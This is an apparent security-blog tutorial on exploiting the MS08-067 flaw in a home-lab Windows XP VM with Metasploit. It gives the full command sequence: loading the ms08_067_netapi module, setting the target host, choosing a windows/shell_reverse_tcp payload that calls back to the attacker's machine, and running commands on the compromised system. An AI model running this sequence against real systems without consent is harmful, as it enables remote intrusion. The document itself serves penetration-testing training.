We will be going through the basics of using Metasploit to exploit Windows XP machine using MS08–067 vulnerability in this article.
Setup Used for Practicing Metasploit Basics:
- Install the latest version of Virtualbox based on your host o/s from (https://www.virtualbox.org/wiki/Downloads)
- Download and install Kali Linux 2018.2 ISO as Virtualbox VM and set Networking to Bridged mode for this VM.
- Buy and Install a Fresh Windows XP SP2 ISO with no updates installed as Virtualbox VM and set Networking to Bridged mode for this VM.
- It is recommended to confirm if Windows XP VM we have installed is Missing ms08–067 Update — (https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) and if you found this update installed, kindly uninstall this update.
- We need Kali Linux 2018.2 as Kali comes with Metasploit Framework pre-installed.
- We need Target Windows machine to explore the steps involved in using Metasploit to exploit MS08–067: Vulnerability in Server Service Could Allow Remote Code Execution (https://www.cvedetails.com/cve/CVE-2008-4250/)
Starting Metasploit Framework in Kali VM:
1) Start the PostgreSQL database with the following command in Kali Terminal
service postgresql start
2) Now we can start the Metasploit service with the following command in Kali Terminal
service metasploit start3) Once metasploit service has started now we can start metasploit text based console with the following command in Kali Terminal
msfconsole
Basics of Metasploit Framework via exploitation of ms08–067 vulnerability in Windows XP VM:
1) Metasploit search command usage
We will use search command to search for if any module available in metasploit for vulnerability in focus which is ms08–067, hence enter the following command in kali terminal
search ms08–067
2) Metasploit Info command usage
Now in order to gather detailed information about available metasploit module for ms08–067 vulnerability, we will enter the following command in kali terminal
Info exploit/windows/smb/ms08_067_netapi
The key features to be noticed from info command results are mentioned below:
Platform, Rank, Privileged, Available Targets, Basic Options, Payload Information etc.
- Platform : Target Operating Systems in which this module will work like Windows or Linux or Android
- Rank : Always recommended to choose exploits with a better ranking like Excellent or Great.
- Privileged : Gives idea if this module will provide or need high privileges on the Target
- Available Targets: Lists all possible targets that can be exploited by this module
- Basic Options: Lists the options which can be set before using this module against the target. Allowing the user to customize various basic options based on attacker needs. It informs us of the mandatory options which need to be set for the module to run.
- Payload Information : Lists the information which helps us decide which are payloads that are compatible with a specific exploit because payloads help us in post exploitation once the target is in our control.
Related Blog – Astra’s Sample Penetration Testing Report
3) Metasploit use command usage
Once we confirm the specific metasploit module (exploit) to use, we can execute the command below to use the specific exploit available for ms08–067 vulnerability.
use windows/smb/ms08_067_netapi
4) Setting up the Module Options in Metasploit
Once you have chosen specific exploit, enter the following command to list all options available for this exploit module and also notice the column Required in image below, It is mandatory to fill the options where the value of Required is yes.
show options
5) Setting RHOST to Target Windows XP VM IP Address
IP Address of Windows XP VM (Found by entering ipconfig command in cmd of Windows XP VM).
In Kali Terminal enter the command below to set RHOST as Windows XP VM
Set RHOST 192.168.0.8
Now we can go ahead and change other options available such as RPORT and SMBPIPE to user defined values as per our need but for the sake of following through this article, we will leave all other options as default values set works fine for this exploit.
6) Using an Available Target for specific Metasploit Module
Now we can enter the command mentioned below to list all available targets for our (ms08_067_netapi) module
show targets
We can set specific target based on operating system our target is running by entering the command below:
set Target (Target Number)
But in this tutorial, we will leave the default option of Automatic Targeting.
Related Blog – Penetration Testing
7) Selecting and using any of Compatible Payloads for this Exploit module
Enter the following command in terminal to list all compatible payloads available for this exploit.
show payloads
Now we can set any of best payloads, let’s say windowsàshell_reverse_tcp by using the command below
set payload windows/shell_reverse_tcp8) Setting up Payload Options before exploitation
show options
Enter the above command in terminal to view the options set for Payload and Module. We have already set the necessary options for module, now since our payload is a reverse shell, we need to set value for LHOST option to Kali Linux by using command mentioned below:
set LHOST 192.168.0.79) Exploiting the Target with Metasploit
Now enter the exploit command in terminal now to get a command shell on our Target.
10) Proof of Exploitation
Now we can execute some of windows commands to get information regarding the compromised machine using commands systeminfo and ipconfig as shown below:
Stay Tuned, we will explore Post Exploitation with Metasploit (Meterpreter Basics) in Part 2 of this article.